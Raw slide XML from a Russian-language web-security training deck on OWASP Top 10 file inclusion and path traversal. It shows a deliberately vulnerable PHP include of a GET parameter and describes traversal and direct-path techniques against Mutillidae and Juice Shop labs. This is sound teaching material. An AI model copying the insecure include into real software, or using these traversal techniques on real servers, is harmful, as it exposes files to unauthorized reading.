            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> = $_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&lt;b&gt; &lt;p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>align</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Пример веб-приложения, доступный в Интернете.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&lt;/p&gt;&lt;/b&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11781ED-1F78-4D70-A5BC-A7A1853824C5}"/>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Причины возникновения </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold"/>
              </a:rPr>
              <a:t>LFI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17408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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E775DDF-E373-4241-999C-313479D26DEB}"/>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LFI, Path Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8EAAA32-634A-4CB5-AE0D-8A245E8FEC49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356686" y="1242611"/>
            <a:ext cx="11392402" cy="1754326"/>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dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Страница, отображаемая в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>, определяется </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>значением параметра "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>". </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Что произойдет, если параметр "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>" будет изменен на имя файла, который находится на сервере, но не предназначен для обслуживания? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU"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Этот дефект может быть объединен с другими дефектами. Например, параметр "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>" может быть передан как через GET, так и через POST благодаря дефекту опроса параметров. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{182A9A4E-A5B4-4775-8085-890B151ECA51}"/>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Методология обнаружения</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="TT Hoves DemiBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Рисунок 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FAE27A4-7679-45AF-87CE-41BEC9107A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2701735" y="3159350"/>
            <a:ext cx="6788529" cy="2597350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162764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190AB684-CE88-47B1-B073-77D3650C1C56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640265" y="898072"/>
            <a:ext cx="6742274" cy="833746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="6600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="6600" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>OWASP TOP-10</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="5400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="456455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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E775DDF-E373-4241-999C-313479D26DEB}"/>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LFI, Path Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8EAAA32-634A-4CB5-AE0D-8A245E8FEC49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356686" y="1658109"/>
            <a:ext cx="11392402" cy="923330"/>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dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Использование </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>оператора обхода родителя ("...") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>может помочь вырваться из файловых папок веб-сервера. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU"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Также можно попробовать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>использовать прямые пути к файлам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{182A9A4E-A5B4-4775-8085-890B151ECA51}"/>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Методология обнаружения</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="TT Hoves DemiBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Рисунок 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{936825EC-843E-4C1E-AF61-4F7A141199ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2701735" y="3159350"/>
            <a:ext cx="6788529" cy="2597350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1344683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Рисунок 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A93CE9BB-FD43-4F4B-B9A1-E38C24FE7FE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="442912" y="1592263"/>
            <a:ext cx="5409248" cy="3846305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Текст 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A06594E-B144-4F8C-AEA2-B79DAFDF343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LFI, Path Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9027BA05-4B81-4889-9D62-6FA86AED7A54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1497966"/>
            <a:ext cx="5653088" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Перейдите по адресу http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>juiceshop.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>:3000/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> (как в разделе Доступ к конфиденциальному документу.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>При прямом открытии http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>juiceshop.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>:3000/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
